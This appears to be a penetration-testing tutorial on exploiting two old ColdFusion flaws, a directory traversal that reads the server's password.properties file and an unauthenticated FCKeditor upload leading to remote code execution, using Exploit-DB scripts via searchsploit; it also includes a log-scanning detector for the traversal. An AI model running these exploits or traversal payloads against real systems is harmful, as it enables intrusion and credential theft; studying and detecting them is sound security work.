# ColdFusion Exploitation Guide

## 1. Overview of ColdFusion Vulnerabilities

ColdFusion is a Java-based web application development platform known for CFML (ColdFusion Markup Language). Several versions contain severe vulnerabilities, including:

* **CVE-2010-2861 (Directory Traversal)** – Allows attackers to read arbitrary files by manipulating the locale parameter.
* **CVE-2009-2265 (Unauthenticated RCE)** – Permits unauthenticated file uploads, leading to Remote Code Execution (RCE) through the FCKeditor package.

***

## 2. Exploitation Techniques

### 2.1 Directory Traversal Exploit (CVE-2010-2861)

**Objective:** Read arbitrary files from the ColdFusion server.

#### Steps:

1. **Search for available exploits**

   ```bash
   searchsploit adobe coldfusion
   searchsploit -p 14641
   ```
2. **Copy the exploit script to the working directory**

   ```bash
   cp /usr/share/exploitdb/exploits/multiple/remote/14641.py .
   ```
3. **Execute the script**

   ```bash
   python2 14641.py <target_ip> <target_port> <file_path>
   ```

**Example Usage:**

```bash
python2 14641.py 10.129.204.230 8500 "../../../../../../../../ColdFusion8/lib/password.properties"
```
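
A defender-side check for the traversal described above, as an added example that is not part of the original guide: it scans web access-log lines for `locale` values that contain `../` sequences (including percent-encoded forms) or that do not look like a locale at all. The log format, client IPs and `/app/*.cfm` paths are constructed assumptions; the traversal string reuses the file path from the example usage.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample access-log lines (combined format); IPs and /app paths are illustrative.
SAMPLE_LOG = """\
198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /app/login.cfm?locale=en HTTP/1.1" 200 512
198.51.100.9 - - [01/Jan/2024:10:00:05 +0000] "GET /app/login.cfm?locale=../../../../../../../../ColdFusion8/lib/password.properties HTTP/1.1" 200 901
198.51.100.9 - - [01/Jan/2024:10:00:09 +0000] "GET /app/login.cfm?locale=%252e%252e%252f%252e%252e%252fColdFusion8%252flib%252fpassword.properties HTTP/1.1" 200 901
198.51.100.7 - - [01/Jan/2024:10:00:12 +0000] "GET /app/list.cfm?page=2&locale=fr_FR HTTP/1.1" 200 640
198.51.100.9 - - [01/Jan/2024:10:00:20 +0000] "GET /app/login.cfm?locale=/ColdFusion8/lib/password.properties HTTP/1.1" 200 301
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*"')
LOCALE_OK = re.compile(r'^[A-Za-z]{2,3}(?:[_-][A-Za-z0-9]{2,8})*$')  # en, fr_FR, zh-Hans-CN
TRAVERSAL = re.compile(r'\.\.[/\\]')

def fully_decode(value, max_rounds=5):
    """Percent-decode repeatedly so single- and double-encoded values normalise alike."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_locale_requests(log_text):
    """Return (client_ip, decoded_locale, verdict) for every abnormal locale value."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line in the assumed format
        query = urlsplit(m.group("target")).query
        for name, raw in parse_qsl(query, keep_blank_values=True):
            if name.lower() != "locale":
                continue
            value = fully_decode(raw)
            if TRAVERSAL.search(value):
                findings.append((m.group("ip"), value, "traversal"))
            elif not LOCALE_OK.match(value):
                # Allowlist catches path-like values the traversal signature misses.
                findings.append((m.group("ip"), value, "not-a-locale"))
    return findings

if __name__ == "__main__":
    for finding in suspicious_locale_requests(SAMPLE_LOG):
        print(finding)
```

Access logs record only the query string, so a `locale` value sent in a request body needs WAF or application-level logging to be seen.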

***

### 2.2 Unauthenticated Remote Code Execution (CVE-2009-2265)

**Objective:** Gain remote code execution by exploiting a vulnerability in ColdFusion’s FCKeditor package.

#### Steps:

1. **Search for the exploit**

   ```bash
   searchsploit -p 50057
   ```
2. **Copy the exploit script**

   ```bash
   cp /usr/share/exploitdb/exploits/cfm/webapps/50057.py .
   ```
3. **Modify the script** – Update local and remote IP addresses and ports.
4. **Execute the exploit**

   ```bash
   python3 50057.py
   ```

***

## 3. Commands Summary

### 3.1 SearchSploit Usage

```bash
searchsploit adobe coldfusion
searchsploit -p 14641
searchsploit -p 50057
```

### 3.2 File Manipulation

```bash
cp /usr/share/exploitdb/exploits/multiple/remote/14641.py .
cp /usr/share/exploitdb/exploits/cfm/webapps/50057.py .
```

### 3.3 Exploit Execution

```bash
python2 14641.py <target_ip> <target_port> <file_path>
python3 50057.py
```

***

## 4. Key Takeaways

* **SearchSploit** is a useful tool for identifying known vulnerabilities and exploits.
* **Directory traversal** can allow unauthorized access to sensitive files.
* **Unauthenticated RCE** can lead to full system compromise.
* Always modify exploit scripts to fit your target’s IP and port.
* **Responsible and ethical hacking is critical** – never exploit systems without permission.
